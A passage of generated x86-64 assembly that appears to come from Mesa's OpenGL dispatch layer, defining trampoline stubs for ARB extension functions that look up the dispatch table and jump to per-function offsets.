call _glapi_get_dispatch
popq %rdi
movq 3440(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadTransposeMatrixdARB), .-GL_PREFIX(LoadTransposeMatrixdARB)
.p2align 4,,15
.globl GL_PREFIX(LoadTransposeMatrixfARB)
.type GL_PREFIX(LoadTransposeMatrixfARB), @function
GL_PREFIX(LoadTransposeMatrixfARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3448(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3448(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3448(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3448(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(LoadTransposeMatrixfARB), .-GL_PREFIX(LoadTransposeMatrixfARB)
.p2align 4,,15
.globl GL_PREFIX(MultTransposeMatrixdARB)
.type GL_PREFIX(MultTransposeMatrixdARB), @function
GL_PREFIX(MultTransposeMatrixdARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3456(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3456(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3456(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3456(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultTransposeMatrixdARB), .-GL_PREFIX(MultTransposeMatrixdARB)
.p2align 4,,15
.globl GL_PREFIX(MultTransposeMatrixfARB)
.type GL_PREFIX(MultTransposeMatrixfARB), @function
GL_PREFIX(MultTransposeMatrixfARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3464(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3464(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3464(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3464(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(MultTransposeMatrixfARB), .-GL_PREFIX(MultTransposeMatrixfARB)
.p2align 4,,15
.globl GL_PREFIX(SampleCoverageARB)
.type GL_PREFIX(SampleCoverageARB), @function
GL_PREFIX(SampleCoverageARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3472(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 3472(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3472(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 3472(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(SampleCoverageARB), .-GL_PREFIX(SampleCoverageARB)
.p2align 4,,15
.globl GL_PREFIX(CompressedTexImage1DARB)
.type GL_PREFIX(CompressedTexImage1DARB), @function
GL_PREFIX(CompressedTexImage1DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3480(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3480(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3480(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3480(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexImage1DARB), .-GL_PREFIX(CompressedTexImage1DARB)
.p2align 4,,15
.globl GL_PREFIX(CompressedTexImage2DARB)
.type GL_PREFIX(CompressedTexImage2DARB), @function
GL_PREFIX(CompressedTexImage2DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3488(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3488(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3488(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3488(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexImage2DARB), .-GL_PREFIX(CompressedTexImage2DARB)
.p2align 4,,15
.globl GL_PREFIX(CompressedTexImage3DARB)
.type GL_PREFIX(CompressedTexImage3DARB), @function
GL_PREFIX(CompressedTexImage3DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3496(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3496(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3496(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3496(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexImage3DARB), .-GL_PREFIX(CompressedTexImage3DARB)
.p2align 4,,15
.globl GL_PREFIX(CompressedTexSubImage1DARB)
.type GL_PREFIX(CompressedTexSubImage1DARB), @function
GL_PREFIX(CompressedTexSubImage1DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3504(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3504(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3504(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3504(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexSubImage1DARB), .-GL_PREFIX(CompressedTexSubImage1DARB)
.p2align 4,,15
.globl GL_PREFIX(CompressedTexSubImage2DARB)
.type GL_PREFIX(CompressedTexSubImage2DARB), @function
GL_PREFIX(CompressedTexSubImage2DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3512(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3512(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3512(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3512(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexSubImage2DARB), .-GL_PREFIX(CompressedTexSubImage2DARB)
.p2align 4,,15
.globl GL_PREFIX(CompressedTexSubImage3DARB)
.type GL_PREFIX(CompressedTexSubImage3DARB), @function
GL_PREFIX(CompressedTexSubImage3DARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3520(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3520(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3520(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
pushq %rcx
pushq %r8
pushq %r9
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %r9
popq %r8
popq %rcx
popq %rdx
popq %rsi
popq %rdi
movq 3520(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(CompressedTexSubImage3DARB), .-GL_PREFIX(CompressedTexSubImage3DARB)
.p2align 4,,15
.globl GL_PREFIX(GetCompressedTexImageARB)
.type GL_PREFIX(GetCompressedTexImageARB), @function
GL_PREFIX(GetCompressedTexImageARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3528(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3528(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3528(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3528(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetCompressedTexImageARB), .-GL_PREFIX(GetCompressedTexImageARB)
.p2align 4,,15
.globl GL_PREFIX(DisableVertexAttribArrayARB)
.type GL_PREFIX(DisableVertexAttribArrayARB), @function
GL_PREFIX(DisableVertexAttribArrayARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3536(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3536(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3536(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3536(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DisableVertexAttribArrayARB), .-GL_PREFIX(DisableVertexAttribArrayARB)
.p2align 4,,15
.globl GL_PREFIX(EnableVertexAttribArrayARB)
.type GL_PREFIX(EnableVertexAttribArrayARB), @function
GL_PREFIX(EnableVertexAttribArrayARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3544(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
call _x86_64_get_dispatch@PLT
popq %rdi
movq 3544(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3544(%rax), %r11
jmp *%r11
1:
pushq %rdi
call _glapi_get_dispatch
popq %rdi
movq 3544(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(EnableVertexAttribArrayARB), .-GL_PREFIX(EnableVertexAttribArrayARB)
.p2align 4,,15
.globl GL_PREFIX(GetProgramEnvParameterdvARB)
.type GL_PREFIX(GetProgramEnvParameterdvARB), @function
GL_PREFIX(GetProgramEnvParameterdvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3552(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3552(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3552(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3552(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramEnvParameterdvARB), .-GL_PREFIX(GetProgramEnvParameterdvARB)
.p2align 4,,15
.globl GL_PREFIX(GetProgramEnvParameterfvARB)
.type GL_PREFIX(GetProgramEnvParameterfvARB), @function
GL_PREFIX(GetProgramEnvParameterfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3560(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3560(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3560(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3560(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramEnvParameterfvARB), .-GL_PREFIX(GetProgramEnvParameterfvARB)
.p2align 4,,15
.globl GL_PREFIX(GetProgramLocalParameterdvARB)
.type GL_PREFIX(GetProgramLocalParameterdvARB), @function
GL_PREFIX(GetProgramLocalParameterdvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3568(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3568(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3568(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3568(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramLocalParameterdvARB), .-GL_PREFIX(GetProgramLocalParameterdvARB)
.p2align 4,,15
.globl GL_PREFIX(GetProgramLocalParameterfvARB)
.type GL_PREFIX(GetProgramLocalParameterfvARB), @function
GL_PREFIX(GetProgramLocalParameterfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3576(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3576(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3576(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3576(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramLocalParameterfvARB), .-GL_PREFIX(GetProgramLocalParameterfvARB)
.p2align 4,,15
.globl GL_PREFIX(GetProgramStringARB)
.type GL_PREFIX(GetProgramStringARB), @function
GL_PREFIX(GetProgramStringARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3584(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3584(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3584(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3584(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramStringARB), .-GL_PREFIX(GetProgramStringARB)
.p2align 4,,15
.globl GL_PREFIX(GetProgramivARB)
.type GL_PREFIX(GetProgramivARB), @function
GL_PREFIX(GetProgramivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3592(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3592(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3592(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3592(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetProgramivARB), .-GL_PREFIX(GetProgramivARB)
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribdvARB)
.type GL_PREFIX(GetVertexAttribdvARB), @function
GL_PREFIX(GetVertexAttribdvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3600(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3600(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3600(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3600(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribdvARB), .-GL_PREFIX(GetVertexAttribdvARB)
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribfvARB)
.type GL_PREFIX(GetVertexAttribfvARB), @function
GL_PREFIX(GetVertexAttribfvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3608(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3608(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3608(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3608(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribfvARB), .-GL_PREFIX(GetVertexAttribfvARB)
.p2align 4,,15
.globl GL_PREFIX(GetVertexAttribivARB)
.type GL_PREFIX(GetVertexAttribivARB), @function
GL_PREFIX(GetVertexAttribivARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3616(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3616(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3616(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3616(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(GetVertexAttribivARB), .-GL_PREFIX(GetVertexAttribivARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4dARB)
.type GL_PREFIX(ProgramEnvParameter4dARB), @function
GL_PREFIX(ProgramEnvParameter4dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3624(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3624(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3624(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3624(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4dARB), .-GL_PREFIX(ProgramEnvParameter4dARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4dvARB)
.type GL_PREFIX(ProgramEnvParameter4dvARB), @function
GL_PREFIX(ProgramEnvParameter4dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3632(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3632(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3632(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3632(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4dvARB), .-GL_PREFIX(ProgramEnvParameter4dvARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4fARB)
.type GL_PREFIX(ProgramEnvParameter4fARB), @function
GL_PREFIX(ProgramEnvParameter4fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3640(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3640(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3640(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3640(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4fARB), .-GL_PREFIX(ProgramEnvParameter4fARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramEnvParameter4fvARB)
.type GL_PREFIX(ProgramEnvParameter4fvARB), @function
GL_PREFIX(ProgramEnvParameter4fvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3648(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3648(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3648(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3648(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramEnvParameter4fvARB), .-GL_PREFIX(ProgramEnvParameter4fvARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramLocalParameter4dARB)
.type GL_PREFIX(ProgramLocalParameter4dARB), @function
GL_PREFIX(ProgramLocalParameter4dARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3656(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3656(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3656(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3656(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramLocalParameter4dARB), .-GL_PREFIX(ProgramLocalParameter4dARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramLocalParameter4dvARB)
.type GL_PREFIX(ProgramLocalParameter4dvARB), @function
GL_PREFIX(ProgramLocalParameter4dvARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3664(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rdx
call _x86_64_get_dispatch@PLT
popq %rdx
popq %rsi
popq %rdi
movq 3664(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3664(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rdx
call _glapi_get_dispatch
popq %rdx
popq %rsi
popq %rdi
movq 3664(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(ProgramLocalParameter4dvARB), .-GL_PREFIX(ProgramLocalParameter4dvARB)
.p2align 4,,15
.globl GL_PREFIX(ProgramLocalParameter4fARB)
.type GL_PREFIX(ProgramLocalParameter4fARB), @function
GL_PREFIX(ProgramLocalParameter4fARB):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 3672(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _x86_64_get_dispatch@PLT
movq 40(%rsp), %xmm3
movq 32(%rsp), %xmm2
movq 24(%rsp), %xmm1
movq 16(%rsp), %xmm0
movq 8(%rsp), %rsi
movq (%rsp), %rdi
addq $56, %rsp
movq 3672(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 3672(%rax), %r11
jmp *%r11
1:
subq $56, %rsp
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %xmm0, 16(%rsp)
movq %xmm1, 24(%rsp)
movq %xmm2, 32(%rsp)
movq %xmm3, 40(%rsp)
call _glapi_get_dispatch
